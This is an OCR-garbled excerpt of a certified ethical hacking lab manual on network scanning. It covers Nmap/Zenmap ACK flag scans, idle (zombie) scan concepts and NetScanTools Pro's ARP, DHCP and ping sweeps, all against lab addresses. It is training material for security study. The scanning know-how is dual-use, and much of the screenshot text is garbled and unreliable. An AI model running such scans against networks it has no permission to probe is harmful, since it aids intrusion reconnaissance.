waits for a probe response
before giving up or □ O perating system detection (- M a im o n scan (-sM )

retransmitting the probe. □ Version detection (-5V) N u ll scan (-sNl

This is calculated based on O Idle Scan (Zom bie) (‫־‬si) TCP SYN scan (-5S)
the response times of
□ FTP bounce attack (‫־‬b) TCP conn ect scan (-sT)
previous probes.
f l Disable reverse DNS resolutior Vbincov\ scan (-sW)

1 1 IPv6 su pp ort (-6) Xmas Tree scan (-5X)

£ancel Q Save Changes

FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab

4 0 . N o w c li c k t h e Ping t a b a n d c h e c k IPProto probes (‫־‬PO) t o p r o b e t h e I P

a d d r e s s , a n d t h e n c li c k Sa v e Changes.

Profile Editor
n m a p -sA -sNJ -T4 -A -v -PO 100.0.4 [Scan]

G The Option: -max-

Profile Scan Ping S cnp tin g| Target | Source jOther Tim ing
H e lp
ICMPtim«£tampr#qu*:t
retries <numtries> (Specify Ping o ptio ns
Send an ICMP tim e stam p probe to
the maximum number of □ D on't p ing before scanning (‫־‬Pn) i
see targets are up.
port scan probe
I I ICMP p ing (‫־‬PE)
retransmissions). When
Nmap receives no response Q ICMP tim e stam p request (-PP)

to a port scan probe, it can I I ICMP netmask request [-PM)

mean the port is filtered. □ ACK ping (-PA)
Or maybe the probe or
□ SYN p ing (-PS)
response was simply lost
on the network. Q UDP probes (-PU)

0 jlPProto prcb«s (-PO)i

( J SCTP INIT ping probes (-PY)

Cancel Save Changes

FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab

4 1 . 111 t h e Zenm ap m a i n w i n d o w , i n p u t d i e I P a d d re ss o f th e ta rg e t
m a c h i n e ( in d i i s L a b : 10.0.0.3), s e l e c t A C K Flag Sca n f r o m Profile:
d r o p - d o w n lis t, a n d t h e n c li c k Scan.

C EH Lab Manual Page 138 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenmap ‫־ם‬
Scan Tools Profile Help

Target: 10.0.0.4 v Profile: ACK Flag Scan

‫פב‬ Scan Cancel

C o m m a n d: nm a p -sA -PO 10.0.0.4

H osts Services N m ap O u tp u t Ports / Hosts I T o p o lo g y ] H ost Details Scans J

£ 3 The option: -‫־‬host- D e ta ils

timeout <time> (Give up
on slow target hosts). Some
hosts simply take a long
time to scan. This may be
due to poody performing
or unreliable networking
hardware or software,
packet rate limiting, or a
restrictive firewall. The
slowest few percent of the
scanned hosts can eat up a
majority of the scan time.

Filter Hosts

FIGURE 6.32: The Zenmap main window with the Target and Profile entered

42. N m a p s c a n s d ie ta rg e t I P a d d re ss p ro v id e d a n d d is p la y s r e s u l t s o n
Nmap Output ta b .
X ‫ן‬
Zenmap
r Sc$n Tools £ r o fle Help

Target: 10.0.0.4 Profile: ACK Flag Scan Cancel

C o m m a n d: nm a p -s A -P 0 1C.0.0.4

Hosts Sen/ices N m ap O u tp u t j P o r ts /H o s ts [ T o po lo gy H ost Details Scans

The option: —scan- OS < Host nm a p -sA -PO 10D.0.4 Details

delay <time>; --max-scan- * 10.0.0.4

delay <time> (Adjust delay S t a r tin g ^map 6 .0 1 ( h ttp :/ / n m a p .o r g ) at 2012-08-24 1 7 :0 3
India Standard Tine
between probes) .This Nmap s c a n re p o rt fo r 1 0 .0 .0 .4
option causes Nmap to Host is u9 (0.00000301 latency).
wait at least the given A ll 1000 scanned ports on 10.0.0.4 are unfiltered
WAC A d d r e s s : 3 0 :1 5 :5 0 :0 0 :0 7 :1 0 (M ic r o s o ft )
amount of time between
each probe it sends to a Nmap d o n e : 1 IP a d d ress (1 host up) scannec in 7 .5 7 second s
given host. This is
particularly useful in the
case of rate limiting.

Filter Hosts

FIGURE 6.33: The Zenmap main window with the Nmap Output tab

4 3 . T o v i e w m o r e d e ta i ls r e g a r d i n g t h e h o s t s , c li c k d i e Host Details t a b

C EH Lab Manual Page 139 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Zenmap
Scan Tools P rofile H e lp

Target: 10.0.0.4 [~v~| Profile: ACK Flag Scan Scan Cancel

Q The option: —min-
C o m m a n d: nm a p -s A -P O !0.0.04
rate <number>; —max-rate
< number> (Directly
Hosts || Services | N m ap O u tp u t J Ports / Hosts J Topo lo gy H o s tD e ta ls Scans
control the scanning rate).
Nmap's dynamic timing OS « Host ‫ ; ־‬10.0.04
does a good job of finding * 10.0.0.4 5 H o st S tatus
an appropriate speed at State
which to scan. Sometimes,
however, you may happen
O pen portc:

Filtered ports:
IS
to know an appropriate
Closed ports:
scanning rate for a
network, or you may have S ea m e d ports: 1000

to guarantee that a scan U p t im e N o t available

finishes by a certain time. Last b o o t N o t available

B A d d re s s e s
IPv4: 1a0.0.4

IPv6: N o t available

M AC: 0Q15:50:00:07:10

♦ Comments

Filter Hosts

FIGURE 6.34: The Zenmap main window with the Host Details tab

L a b A n a ly s is

D o c u m e n t all d i e I P a d d r e s s e s , o p e n a n d c lo s e d p o r t s , s e n d e e s , a n d p r o t o c o l s y o u
d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

T y p es o f S can u sed :

■ In te n s e scan
■ X m as scan
‫י‬ N u ll sc a n
■ A C K F la g s c a n

I n te n s e S c a n —N m a p O u tp u t

■ A R P P in g S c a n - 1 h o s t
■ P a ra lle l D N S r e s o lu ti o n o f 1 h o s t

N m ap ■ S Y N S te a lth S c a n
• D i s c o v e r e d o p e n p o r t o n 1 0 .0 .0 .4
o 1 3 5 / tc p , 1 3 9 / tc p , 4 4 5 / tc p , . ..
■ M A C A d d re ss
■ O p e r a tin g S y s te m D e ta ils
■ U p tim e G u e s s
■ N e tw o r k D is ta n c e
■ T C P S e q u e n c e P re d ic tio n
■ I P I D S e q u e n c e G e n e ra tio n
■ S e rv ic e I n f o

C EH Lab Manual Page 140 Ethical Hacking and Countermeasures Copyright © by EC ‫־‬Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO

THIS LAB.

Q u e s t io n s

1. A n a ly z e a n d e v a lu a te t h e r e s u lts b y s c a n n i n g a ta r g e t n e t w o r k u s in g ;

a. S te a l th S c a n ( H a l f - o p e n S c a n )

b. nm ap -P

2. P e r f o r m I n v e r s e T C P F la g S c a n n in g a n d a n a ly z e h o s t s a n d s e r v ic e s f o r a
t a r g e t m a c h i n e i n d i e n e tw o r k .

I n te r n e t C o n n e c tio n R e q u ire d

□ Y es 0 No

P la tfo rm S u p p o rte d

0 C la s s ro o m 0 iL a b s

C EH Lab Manual Page 141 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Scanning a Network Using the

NetScan Tools Pro
NetScanToolsPro is an integratedcollection of internetinformationgatheringand
netirork troubleshootingutilitiesforNehrork P/vfessionals.
ICON KEY L a b S c e n a r io
2 3 ‫ ־‬Valuable
Y o u h a v e a lr e a d y n o t i c e d i n d i e p r e v i o u s la b h o w y o u c a n g a d i e r i n f o r m a t i o n s u c h
information
as A R P p in g scan, M A C a d d re s s , o p e ra tin g s y s te m d e ta ils , I P ID sequence
Test your g e n e r a t io n , s e r v ic e in f o , e tc . d i r o u g h Intense Scan. Xmas Scan. Null Scan a n d
knowledge
ACK Flag Scan 111 N m a p . A 1 1 a tt a c k e r c a n s im p ly s c a n a ta r g e t w i d i o u t s e n d i n g a
‫ס‬ Web exercise sin g le p a c k e t t o th e ta r g e t f r o m th e i r o w n I P a d d r e s s ; in s te a d , d i e y u s e a zombie
host t o p e r f o r m th e sc a n re m o te ly a n d i f a n intrusion detection report is
m W orkbook review
g e n e r a t e d , i t w ill d is p la y d i e I P o f d i e z o m b i e h o s t a s a n a tta c k e r . A tta c k e r s c a n
e a s ily k n o w h o w m a n y p a c k e t s h a v e b e e n s e n t s in c e d ie la s t p r o b e b y c h e c k i n g d i e
I P p a c k e t fragment identification number ( I P I D ) .

A s a n e x p e r t p e n e t r a t i o n te s te r , y o u s h o u l d b e a b le t o d e t e r m i n e w h e d i e r a T C P
p o r t is o p e n t o s e n d a SYN ( s e s s io n e s t a b li s h m e n t ) p a c k e t t o t h e p o r t . T h e ta r g e t
m a c h i n e w ill r e s p o n d w i d i a SYN ACK ( s e s s io n r e q u e s t a c k n o w le d g e m e n t) p a c k e t i f
d ie p o r t is o p e n a n d RST (re s e t) i f d i e p o r t is c lo s e d a n d b e p r e p a r e d t o b l o c k a n y
s u c h a tta c k s 0 1 1 t h e n e t w o r k

111 d iis l a b y o u w ill le a r n t o s c a n a n e t w o r k u s i n g NetScan Tools Pro. Y o u a ls o n e e d

t o d i s c o v e r n e tw o r k , g a d i e r i n f o r m a t i o n a b o u t I n t e r n e t o r lo c a l L A N n e tw o rk
d e v ic e s , I P a d d r e s s e s , d o m a i n s , d e v ic e p o r t s , a n d m a n y o t h e r n e t w o r k s p e c ific s .

L a b O b j e c t iv e s

T h e o b je c tiv e o f d iis la b is a s s is t t o tr o u b l e s h o o t , d ia g n o s e , m o n i t o r , a n d d i s c o v e r
d e v ic e s 0 1 1 n e tw o r k .

1 1 1 d iis la b , y o u n e e d to :

■ D i s c o v e r s I P v 4 / I P v 6 a d d r e s s e s , h o s t n a m e s , d o m a i n n a m e s , e m a il
a d d re sse s, a n d U R L s

D e t e c t lo c a l p o r t s

C EH Lab Manual Page 142 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

S 7Tools L a b E n v ir o n m e n t
demonstrated in
T o p e r f o r m d i e la b , y o u n e e d :
this lab are
available in ■ N e t S c a n T o o l s P r o l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning
D:\CEH- Networks\Scanning Tools\NetScanTools Pro
Tools\CEHv8
■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f N etScan Tools Pro f r o m
Module 03
Scanning t h e l i n k h t t p : / / w w w . 1 1 e t s c a n t o o l s . c o m / n s t p r o m a i 1 1 .h t m l

Networks ■ I f y o u d e c id e t o d o w n l o a d d i e l a t e s t v e r s i o n , d i e n s c r e e n s h o t s s h o w n i n d i e
la b m i g h t d if f e r

■ A c o m p u t e r r u n n i n g Windows Server 2012

■ A d m in i s t r a ti v e p r iv ile g e s t o r u n d i e NetScan Tools Pro t o o l

L a b D u r a t io n

T im e : 1 0 M i n u te s

O v e r v ie w o f N e t w o r k S c a n n in g

N e t w o r k s c a n n i n g is d i e p r o c e s s o f e x a m i n in g d i e activity on a network, w h i c h c a n
i n c l u d e m o n i t o r i n g data flow a s w e ll a s m o n i t o r i n g d i e functioning o f n e t w o r k
d e v ic e s . N e t w o r k s c a n n i n g s e r v e s t o p r o m o t e b o d i d i e security a n d p e r f o r m a n c e
o f a n e tw o r k . N e t w o r k s c a n n i n g m a y a ls o b e e m p l o y e d f r o m o u ts id e a n e t w o r k in
o r d e r t o i d e n t if y p o te n t ia l network vulnerabilities.

N e tS c a n T o o l P r o p e r f o r m s th e fo llo w in g to n e tw o r k sc a n n in g :

■ Monitoring n e t w o r k d e v i c e s a v a il a b il it y

■ Notifies I P a d d r e s s , h o s t n a m e s , d o m a i n n a m e s , a n d p o r t s c a n n i n g

S TASK 1 Lab T asks

Scanning the I n s ta ll N e t S c a n T o o l P r o i n y o u r W i n d o w S e r v e r 2 0 1 2 .
Network
F o ll o w d i e w i z a r d - d r i v e n in s ta l la t io n s te p s a n d in s ta ll NetScan Tool Pro.

1. L a u n c h t h e Sta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t
c o rn e r o f th e d e s k to p

^ Active Discovery and

4 W in d o w s S e r \ * f 201 2
Diagnostic Tools that you
can use to locate and test '1J#
*taataiermXnifaemeCvcidilcOetoceitc
EMtuaian copy, luld M>:
devices connected to your
network. Active discovery
means that we send packets FIGURE /.l: Windows Server 2012- Desktop view
to the devices in order to
obtain responses.. 2. C l i c k t h e N etScan Tool Pro a p p t o o p e n t h e N etScan Tool Pro w i n d o w

C EH Lab Manual Page 143 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

S ta rt Administrator A

Server Windows Googfe H jperV NetScanT...

Manager PowwShel Chrome kb-uoa Pro Demo

h m o ‫וי‬ f*
Control Hjrpw-V
Pan*l
Mdchir*.

Q V
('nmittnd
I't. n.".‫־‬

e w rr
© *I

20‫ ז‬2

x-x-ac n 9
FIGURE 7.2 Windows Server 2012 - Apps

3. I f y o u a r e u s i n g t h e D e m o v e r s i o n o f N e t S c a n T o o l s P r o , t h e n c li c k
Start the DEMO
£L) Database Name be 4. T h e Open or C reate a N ew Result Database-NetScanTooIs Pro
created in the Results
Database Directory and it w i n d o w w ill a p p e a r s ; e n t e r a n e w d a t a b a s e n a m e i n D atabase Name
will have NstProData- (enter new name here)
prefixed and it will have the
file extension .db3 5. S e t a d e f a u l t d i r e c t o r y r e s u l t s f o r d a t a b a s e file l o c a t i o n , c li c k Continue

Open or Create a New Results Database - NetScanTools® Pro *‫ו‬

N etScanToote P ro a u to m a b c a ly s a v e s resu lts n a d a ta b a s e . T h e d a ta b a s e «s re q u re d .

C r e a te a n e w R esu lts D a ta b a s e , o p en a p re viou s R e s d t s D a ta b a s e , or u s e this s o ftw a re r T r a n n g M ode with a

tem po rary R esu lts D a tab a s e .

■‫״‬T rain rtg M ode Qutdc S t a r t: P re s s C r e a te Training M ode D a ta b a s e then p re ss C o ntinue.

D a ta b a s e N am e (e n te r n e w n am e h e re ) A N E W R e s u lts D a ta b a s e w l b e a u to m a b c a ly p re fixed with

,NstProO ata-' a n d w i en d w ith ,. d b ? . N o sp ace s o r periods a r e allowed
Test|
w h en e n te r n g a n e w d a ta b a s e nam e.

S e le c t A n o th er R esu lts D a tab a s e R esu lts D a ta b a s e File Location

R esu lts D a ta b a s e D irectory

‫ *״‬C re a te Trainmg M ode D a ta b a s e
C : ^jJsers\Administrator d o c u m e n ts

P ro je ct N am e (o pb on al)
S e t D e fau lt D irectory

A n a ly s t In form ation (o pb on al, c a n b e c isp laye d r\ rep o rts if desired)

N am e Telep h on e Number

Title Mobile Number

i—' USB Version: start the

software by locating
nstpro.exe on your USB O rganization Email A d dress

drive ‫ ־‬it is normally in the

/nstpro directory p
U p d a te A n a lys t In form a bon

U s e L a s t R e s u lts D a ta b a s e Continue
E x it Program

FIGURE 7.3: setting a new database name for XetScan Tools Pro

6. T h e N etScan Tools Pro m a i n w i n d o w w ill a p p e a r s a s s h o w i n d i e

fo llo w in g fig u re

C EH Lab Manual Page 144 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

test • NetScartTools* Pro Demo Version Build 8-17-12 based o n version 11.19
file Eflit A«es51b!11ty View IP«6 Help

— IP version 6 addresses
have a different format
from IPv4 addresses and
they can be much longer or
far shorter. IPv6 addresses 1
Wefccrwto NrtScanTooh#f^5 [W o Vbtfen 11 TH fattwaiv n a drro ro< k>* •re* t00“i Cut todi hav• niror luiti
Th■ du ro M i a be ccn«e>ted to j W vtfden
always contain 2 or more H m x x d '•on ■hr A Jo i^ e d cr Vtao.a tads cr 1» ‫ »|כ‬groined by fuidian on the kft panel
colon characters and never R03 iso- root carract :‫ «־‬ta‫״‬oet. orwn icon :coa I8!en to net« 11k traff c.
contain periods. Example: ttu ; icon tooo ‫*®•ו‬ wfyojoca sy*em. end groy !con loots contact •hid p51t> w * a w

2 0 0 1 :4 8 6 0 :b 0 0 6 :6 9 Autom ated too is Fleet ' i t FI '«&,to vie‫ ״‬C <?a te rg h * local help !ncLdng Gerttirg Suited tfam&xi
( i p v 6 .g o o g l e .c o m ) M3nu3l lo ci: 13III
o r ::1 (internal fw o rn e tools

loopback address *LCrre Dtt<ov<r/tools

Pass ‫׳‬ve 0 ‫ י‬scow 1y ro ois
o t « 0015‫ז‬
P 3 « tt 1*vn toon
tx tm u l >00is
proown into

FIGURE 7.4: Main window of NetScan Tools Pro

7. S e l e c t Manual Tools (all) o n t h e l e f t p a n e l a n d c li c k A R P Ping. A

w i n d o w w ill a p p e a r s f e w i n f o r m a t i o n a b o u t d i e A R P P i n g T o o l .

8. C li c k OK

test NetScanToois® Pro Demo Version Build 8 17 12 based on version 11.19 ‫־היד‬°• - ‫ז‬
File fd it AccettibHity View IM MHp

Klrt'iianTooltS Pio ' J

Automata!! Tool
Manual Tool( Ml
About the ARP Ping Tool
• use rhK tool to ‫*חקי‬. ' an IPv4 address on your subnet usino ARP packers. »s<it on your
LAN to find the 1a*>:‫*'׳‬£ tkne o ' a device to an ARP_REQl)EST jacket evai if 3ie d&r ce s hidden and
does not respc *d to ‫־׳‬egu a Pn g .
• A R P Pina require*,‫ ג‬target IPv4 address on your LAN.
• D o n 't miss th is special fe a t u re in th is to o l: Identify duplicate IPv4 address b y ‘singing‘ a ssecfic
IPv4 address. If more th a - Gne Cevice (tw o or rrore MAC addresses} responds, you areshow n the
mac a d d ie a o f each o f the deuces.
D o n 't fo r g e t to r!ght d k * in th e results for a menu with more options.
im
•

£ 7 Arp Ping is a useful ARP Scan (MAC U a D em o I im ita tio n s.

tool capable of sending • None.

ARP packets to a target IP

address and it can also
ij
Ca«h« F m n it d

search for multiple devices ♦

sharing the same IP address Co*n«t»o« Monit.
on your LAN c Tooll

A111vc Dhiuveiy To‫׳‬

Piss ‫״‬re Otttovety T«
o n s roots
p 3c« t Level root
brcemai toots
Pro 0r3m Into
| ( <x Help pres* FI

FIGURE 7.5: Selecting manual tools option

9. S e l e c t t h e Send Bro adcast A RP, then U nicast A R P r a d i o b u t t o n , e n t e r

t h e I P a d d r e s s i n Target IPv4 Address, a n d c li c k Send Arp

C EH Lab Manual Page 145 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

test NetScanTools® Pro Demo Version Build 8 17 12 based on version 11.19 ,- !‫ ״‬s i
File Fdit Accessibility View IPv6 Help

Q Send Broadcast ARP,

A u tow ted Tools
and then Unicast ARP -
this mode first sends an ►.lanual Tools lalf) U9e ARP Padtets to Pnc
an [Pv« adjf c55 on y a r E Send B‫־‬ ooCC35t ARP, then U ito st ARP
Dupi:a;-5 S-‫־‬c ‫מ‬
subnet. O send B-oaCcae: arp cnly
ARP packet to the IPv4 (f:00.00 A n ® To Automated |

address using the broadcast

O S e * th for Dipica te IP Addesoss
Ol^FAd* Report?
ARP MAC address. Once it TargetIPv4Aadett Q Add to Psvorftoc

receives a response, it sends

U I ndex ip Aaaress mac Address Response Tine (aaeci Type
ARP Ping
subsequent packets to the iendArc 0 10.0.0.1 - •• • * ♦ - cc 0.002649 Broadcast

responding MAC address. y 1 10.0.0.1 ‫־‬ < * ♦ cc :. o : :» t o Unicast

AflP^can
■an |MA£
|MAC S<»n) Stop 2 10.0.0.1 - - ■+ ce 0.003318 tin Ic a a t
The source IP address is N jr b n to Send 3 10.0.0.1 cc 0.002318 Onieaae
your interface IP as defined
in the Local IP selection
u
Cache Forensic{
Cyde T ne (ms)
4
5
10.0.0.1
10.0.0.1
•
- •• — ♦
cc
cc
0.0:69*3
0.007615
ur.ic a a t
Cr.le a s t
f 10.0.0.1 cc 0.002518 Cr.Ic a a t
box I“00 EJ ‫ל‬ 1 0.0.0.1 - *• • * <» cr 0.M198C Tinic a a t
Connwtwn Monitor |v | WnPcap Interface P 8 10 .0 .0 .1 • • » • ‫'־ ♦ •־‬ cc 0.0:165$ Onieaae
3 10.0.0.1 - •••♦ ♦ ‫־‬ cc 0.0:231.8 Ur.ic a a t
Fawortte Tooli
10 10.0.0.1 cc 0.002649 U n icast
Aa!re DHtovery Tool!
11 1 0.0.0.1 - *• <•> cc 0.0:2649 U n icast
Pj 11!x< Oiiovcry Tooli
12 10.0.0.1 - cc 0.002318 U n icast
O t« Tools
13 10.0.0.1 • • • • • • » «♦ ‫״‬ cc 0.002318 Unicast
P a « « level rools
14 10.0.0.1 • cc O.OS2649 Vnicaat
trte m ji looit
15 10.0.0.1 Unicast
f*‫־‬coram Into

FPuiger 7.6: Result of ARP Ping

1 0. C li c k A R P Sca n (MAC Sca n ) i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r

w i t h i n f o r m a t i o n a b o u t t h e A R P s c a n t o o l . C l i c k OK
test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19
File Fdit Accessibility View IPv6 Help

!alTool! •ARPPi‫׳׳‬y J
Automated Tool
About the ARP Scan Tool
‫ ש‬ARP Scan (sometimes • Use U ib t o o l l o s e n d a n A R P R o q iM & t t o e v u ry IP v 4 ad d ress o n y o u r LAN. IPv4 connected

called a MAC Scan) sends •

d «v u et c s n n o th n to f tv r ‫ ־‬ARP 3acfc«C» and mu»t ru p o n d with t h • ! IP and MAC a d f i r • * • .
Uncheck w e ResoKr? f>5 box for fssrti scan co‫׳‬r p i« o n ome.
ARP packets to the range • Don't Cornet to 1io : d ck n the 1e>ul:s for a menu with moio options.

of IPv4 addresses specified y mo L im itation s. p•‫־‬

by the Start and End IP H one. oadcast
Address entry boxes. The ic o s t
purpose of this tool is to ARPStan 1mac sea lease
rapidly sweep your subnet le a s t
le a s e
for IPv4 connected devices.
Ca<n« ForcnsKs ic a s t
le a s t
le a s t
le a s t
ic a a t
e a s t!
Attn* Uncovefy 10‫׳‬
east !
relive l>K0v»ry l«
le a s t
icaat
H 3«rt level Tool

FIGURE 7.7: Selecting ARP Scan (MAC Scan) option

1 1. E n t e r t h e r a n g e o f I P v 4 a d d r e s s i n Starting IPv4 Address a n d Ending

IPv4 Address t e x t b o x e s

1 2. C li c k Do Arp Scan

C EH Lab Manual Page 146 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

test NetScanTools* Pro Demo Version Build 8-17 12based0nvefs»00 11.19 ‫“־היו‬ ‫י ־־‬
File Edil Accessibility View IPv6 Help

Manual Too 4 -ARP Scan (MAC Scan) $

in tonated Toots
kUnuai Tools laif) U9e thE tool a fine al Staraic F v 4 Accrea‫־‬ adjKocc
active IPv4 d r ie r s o‫י׳‬
youi n im -t. | :0. 0 [ J j ‫׳‬p 0 ‫ ־‬A 1 2 r a a l
&v4ngIPv4A<*jrc55

I ]Addts^avaKat
ARP Ping ip v l M . . . W1CAdtireflfl I / r M 4 n u r* c f3 re r B c a ta ■ * E n tr y Type l>5c•!
1 0 .0 .0 .1 0( ‫׳‬ n e t;c a r, la c . 1 dynam o 10. 0.0
10.0.0.2 EC . &»11 lac vm-MSSCL. d y n azd c 1 0 .0 .0
‫־‬ar The Connection can (M
ASP Scan AC Scan)
(MAC wrtpeap Interfax i p

Detection tool listens for I 10.0.0.7

incoming connections on u
Cache forennct Scon OSsy T n c {•>»)
TCP or UDP ports. It can
also listen for ICMP
(IZZ₪
0 Resolve P s
Connection Monitor
packets. The sources of the
Favorite Tools
incoming connections are
Active OhcC‫׳‬vify Tool!
shown in the results list and Pasiive Ofitovtry Too 11
are logged to a SQLite o m Tools
database. P3<Mt LPV81 Tools
exttmai toon
r^ooram Into
‫פב‬

FIGURE 7.8 Result of ARP Scan (MAC Scan)

1 3 . C li c k DHCP Se rve r D iscovery i n t h e l e f t p a n e l , a w i n d o w w ill a p p e a r

w i t h i n f o r m a t i o n a b o u t D H C P S e r v e r D i s c o v e r y T o o l . C li c k OK

f*: test - NetScanTods® Pro Demo Version Build 8-17-12 based on version 11.19 !‫־‬ n ' *
f4 e Ed* Accessibility View IPv6 Help

RPScan IMAC Son ,

Automatedlool Alum! Hit* DHCP Sorv 1*f Discovery Tool
Manual 10011!all
• Use Uib 1004 to jitn n iy locate DHCP *ervur* <IP v l only) on your local network. It iho m th«
P addr«u and o r « M C'qt ar« b«ng handed out by DHCP wwao. Ih it too! a n aw find unknown
or rooue' DHO3 swverj.
Cathe Forensic!
• Don't I otget to right dck n th* results for a menu with more options.

♦ Dano limitations.
• None.
Connection Monitc
cry Type lo c a l
n a x le 1 0 .0 .0
naxic 10.0.0
O K PSfw r Oucorc
LJ DHCP is a method of
dynamically assigning IP
addresses and other
a
DNS-Tools
Tools-core
«

network parameter
information to network
J
clients from DHCP serv.
Pn u n r DutoveiyTc

P « l r l level Tool
External Too 11

FIGURE 7.9: Selecting DHCP Server Discovery Tool Option

14. S e l e c t a ll t h e D iscover Options c h e c k b o x a n d c li c k Discover DHCP

Servers

C EH Lab Manual Page 147 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

y test - NetScanTools* Pro Demo Version Build 8 -1 7-12 based o r version 11.19 T~Tn 1 « '

I Aurcmated To015
Fnri DHCPServers an fa r
AddItoie
For Hdo. p‫׳‬-e£8F: IM A ‫ ס׳יד״־ג‬A.‫־‬omv‫־‬rd
Q NetScanner, this is a
Ping Scan or Sweep tool. It Cache F orenwes '‫ * ״‬° ] ‫־‬ ‫*״*־‬ ‫[ ־‬

can optionally attempt to Ode or mtrrfacc bdow then crcos Discover

use NetBIOS to gather B
.:n n cc t o n Monitor
Discover ( X P Server* TM A d d re ss KIC A dd reas
QAddtoP®»«nre5
I n t « r f « r • D e s c r ip tio n

MAC addresses and Stop 10.0.0.7 L . Jfc j%‫» ־‬v 411 iD Hyper-V V ir ta • ! Eth ern et Adapter #2

Remote Machine Name Wat Time (sec)

DHCP S«1 1 » ‫ ׳‬Dfccovtry
Tables from Windows
targets, translate the
responding IP addresses to DfIS T
a
ook --!Cote
Took DiscouB‫ ־‬Opttans
Rssordnc DHCP servers
EHCr Server IP Server Hd3LnoM Offered I? Offered Subnet Mask IP Address I
hostnames, query the target
for a subnet mask using a
OWSTools ■Advanced
‫ ׳י‬H05tn3r1e
V Subnet M5*r
V‫ ׳‬Donor ftairc
10.0.0.1 10.0.0.1 10.0.0.2 ‫ י‬SS.2SS.2SS.0 3 days, 0:0(

ICMP, and use ARP F‫־‬worit« Tools

‫ ׳י‬d n s p
‫ ׳י‬Router P
packets to resolve IP A<tfc« Dii coveiy Tools
fa* KTP Servers
address/MAC address Paislv* Discovery Tools

associations DNS Tooll

=*>«» t r r t l TooH
W * rnjl Tools
P10 g r« n into

FIGURE 7.10: Result of DHCP Server Discovery

1 5 . C li c k Ping scan n er i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i t h

i n f o r m a t i o n a b o u t P i n g S c a n n e r t o o l . C li c k OK
test NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19
F8e EdK AtcesiibiRty Vltw IPv6 H«tp

A j.jA IC
WtKOIM N«tSunT00i13 P 10 S?
AUtOIMt«J ToOh
M jn g jJ T00K (411:
About the Ping Scanner (aka NetScanner) lool
• use rim rooJ ro pmo .‫ י‬ranoe or lm of IPv4 addresses. rtvstool shows you cb rompute‫׳‬s
m adflf«s«s. To teeafl ee*‫׳‬ces n your subnrt mdudmg trios*blocking ping, you can
1
are active w tJiir! tr*rano^ii5t(tJ1* hav« to rapond to omo). Uso it *vith * * u t o f F
>10
um ARP Son
Pn g ErV1«K«J
tool.
• You can ■nport a text lest of IPv4 addresses to png

fir,g m
Don't mres this speaal feature m this took use the Do SMB/NBNS scan ‫ כס‬qg: n « B » S resoonscs
-Graphi cal
fiom unprotected W!ndo*s computers.
• Don't forget td nght didc m the results for a menu with more opaons.

£0 Port Scanner is a tool a Demo Im itations.

• Packet Delay (time between sending each ping) is limited to a lower tamt of SO
designed to determine iMlBeconds. packet Delay can be as low as zero (0) ms ‫ מ‬the f ill version. In other words,
which ports on a target the full version w i be a bit faster.
Port Scanner
computer are active Le.
being used by services or .J
daemons. P ’o am u o in Mod* *><«

ravontf 001‫ז‬:
Mint Ducoycnr to ‫׳‬
Paijivt Discovery 10
DNS roou
P a a e ti m l tool}
t<tcma! Tools
°rooram inro

FIGURE 7.11: selecting Ping scanner Option

16. S e l e c t t h e U se Default System DNS r a d i o b u t t o n , a n d e n t e r t h e r a n g e

o f I P a d d r e s s i n Sta rt IP a n d End IP b o x e s

1 7 . C li c k Start

C EH Lab Manual Page 148 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

--- test - NetScanTools * Pro Demo Version Build 8-17-12 based o r version 11.19
«e 6dK Accessibility View IPv6

Aurc mated To 015

Start iP 10.0.0.: ‫׳י‬ |‫ '•׳‬Lke Defadt Systen DN5j

‫חח‬
£Q Traceroute is a tool that
shows the route your © End JP 10.0.0.S0 - 1*1
O Use Specific DNS:
1307.53.8.8 vl l *
network packets are taking Fa Hdp, press F1 AKANrtSeannw □ Add»Po»<nre5
between your computer T a r g e t IP Hostname Time (m | Statao
and a target host. You can 10.0.0.1 ? 0 0:0 t e a : s c p i v
determine the upstream 1 0.5.0.2 tnK-KSSELOUKU 0 0:0 tchs toply
10.0.0.5 my:-UQM3MRiR«M 0 0:0 Echs ta p ly
internet provider(s) that
0 Resolve TPs 1 0 .0 .0 .7 WIN-D39HRSHL9E4 0 0:0 Echs Reply
service a network
connected device. J?
Port Scanner
MSttp.0/.25SWl
Addtbnal Scan Tests:

